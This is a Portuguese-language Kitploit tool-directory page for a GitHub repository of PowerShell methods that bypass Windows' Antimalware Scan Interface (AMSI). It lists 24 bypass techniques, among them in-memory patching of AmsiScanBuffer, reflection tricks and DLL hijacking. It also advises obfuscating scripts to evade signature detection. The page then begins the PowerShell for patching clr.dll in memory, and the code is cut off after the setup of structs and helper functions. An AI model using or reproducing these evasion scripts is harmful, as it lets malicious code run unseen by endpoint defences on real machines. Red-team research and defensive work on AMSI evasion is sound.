Skip to content
KitploitKITPLOIT
FerramentasBlog
Log in
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Amsi-Bypass-Powershell — Este repositório contém alguns métodos de Amsi Bypass que encontrei em diferentes postagens de blog. | Kitploit
Ferramentas/GitHubGitHub/s3cur3th1ssh1t/amsi-bypass-powershell
Ferramentas DefensivasExploraçãoEvasão de IDS/IPSRed TeamingDesenvolvimento de Payloads
GitHubs3cur3th1ssh1t/amsi-bypass-powershell

Amsi-Bypass-Powershell

Este repositório contém alguns métodos de Amsi Bypass que encontrei em diferentes postagens de blog.

Ver Repositório

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
2.2k33368há 1 anoRevisado pelo Kitploit
Compartilhar

Patrocinado por

     

Amsi-Bypass-Powershell

Este repositório contém alguns métodos de bypass / evasão do Antimalware Scan Interface (AMSI) que eu encontrei em diferentes postagens de blogs.

A maioria dos scripts é detectada pelo próprio AMSI. Então você precisa encontrar o trigger e alterar a assinatura na parte via renomeação de variáveis/funções, substituição de strings ou codificação e decodificação em tempo de execução. Alternativamente, ofusque-os via ISESteroids e/ou Invoke-Obfuscation para fazê-los funcionar. Você também pode dar uma olhada no meu post no blog sobre como alterar manualmente a assinatura para obter um bypass válido novamente.

  1. Patch do AmsiScanBuffer no clr.dll
  2. Contrabando de ScriptBlock
  3. Alteração do ScanContent por Reflexão
  4. Usando Breakpoints de Hardware
  5. Usando hooking de CLR
  6. Patch da DLL do provedor da Microsoft MpOav.dll
  7. Interceptação de Varredura e patch de função do Provedor
  8. Patch do AMSI AmsiScanBuffer por rasta-mouse
  9. Patch do AMSI AmsiOpenSession
  10. Não use net webclient - este não funciona mais
  11. Patch do Amsi ScanBuffer de -> https://www.contextis.com/de/blog/amsi-bypass
  12. Forçando um erro
  13. Desabilitar o Log de Scripts
  14. Patch do Buffer AMSI - Em memória
  15. Mesmo que 6, mas Bytes inteiros em vez de Base64
  16. Usando o método de Reflexão de Matt Graeber
  17. Usando o método de Reflexão de Matt Graeber com bypass de autologging WMF5
  18. Usando o segundo método de Reflexão de Matt Graeber
  19. Usando o método de sequestro de DLL de Cornelis de Plaa
  20. Use o PowerShell Versão 2 - Sem suporte AMSI lá
  21. Nishang all in one
  22. Patch de Adam Chester
  23. Versão modificada do 3. Amsi ScanBuffer - sem compilação CSC.exe
  24. Patch do endereço AmsiScanBuffer em System.Management.Automation.dll

Patch do Clr

  • Explicado aqui Modificando a DLL CLR na memória```powershell

Define Constants

$PAGE_READONLY = 0x02 $PAGE_READWRITE = 0x04 $PAGE_EXECUTE_READWRITE = 0x40 $PAGE_EXECUTE_READ = 0x20 $PAGE_GUARD = 0x100 $MEM_COMMIT = 0x1000 $MAX_PATH = 260

Helper functions

function IsReadable { param ($protect, $state) return ((($protect -band $PAGE_READONLY) -eq $PAGE_READONLY -or ($protect -band $PAGE_READWRITE) -eq $PAGE_READWRITE -or ($protect -band $PAGE_EXECUTE_READWRITE) -eq $PAGE_EXECUTE_READWRITE -or ($protect -band $PAGE_EXECUTE_READ) -eq $PAGE_EXECUTE_READ) -and ($protect -band $PAGE_GUARD) -ne $PAGE_GUARD -and ($state -band $MEM_COMMIT) -eq $MEM_COMMIT) }

function PatternMatch { param ($buffer, $pattern, $index) for ($i = 0; $i -lt $pattern.Length; $i++) { if ($buffer[$index + $i] -ne $pattern[$i]) { return $false } } return $true }

if ($PSVersionTable.PSVersion.Major -gt 2) { # Create module builder $DynAssembly = New-Object System.Reflection.AssemblyName("Win32") $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run) $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule("Win32", $False)

# Define structs
$TypeBuilder = $ModuleBuilder.DefineType("Win32.MEMORY_INFO_BASIC", [System.Reflection.TypeAttributes]::Public + [System.Reflection.TypeAttributes]::Sealed + [System.Reflection.TypeAttributes]::SequentialLayout, [System.ValueType])
[void]$TypeBuilder.DefineField("BaseAddress", [IntPtr], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("AllocationBase", [IntPtr], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("AllocationProtect", [Int32], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("RegionSize", [IntPtr], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("State", [Int32], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("Protect", [Int32], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("Type", [Int32], [System.Reflection.FieldAttributes]::Public)
$MEMORY_INFO_BASIC_STRUCT = $TypeBuilder.CreateType()

# Define structs
$TypeBuilder = $ModuleBuilder.DefineType("Win32.SYSTEM_INFO", [System.Reflection.TypeAttributes]::Public + [System.Reflection.TypeAttributes]::Sealed + [System.Reflection.TypeAttributes]::SequentialLayout, [System.ValueType])
[void]$TypeBuilder.DefineField("wProcessorArchitecture", [UInt16], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("wReserved", [UInt16], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("dwPageSize", [UInt32], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("lpMinimumApplicationAddress", [IntPtr], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("lpMaximumApplicationAddress", [IntPtr], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("dwActiveProcessorMask", [IntPtr], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("dwNumberOfProcessors", [UInt32], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("dwProcessorType", [UInt32], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("dwAllocationGranularity", [UInt32], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("wProcessorLevel", [UInt16], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("wProcessorRevision", [UInt16], [System.Reflection.FieldAttributes]::Public)
$SYSTEM_INFO_STRUCT = $TypeBuilder.CreateType()
Baixar ferramenta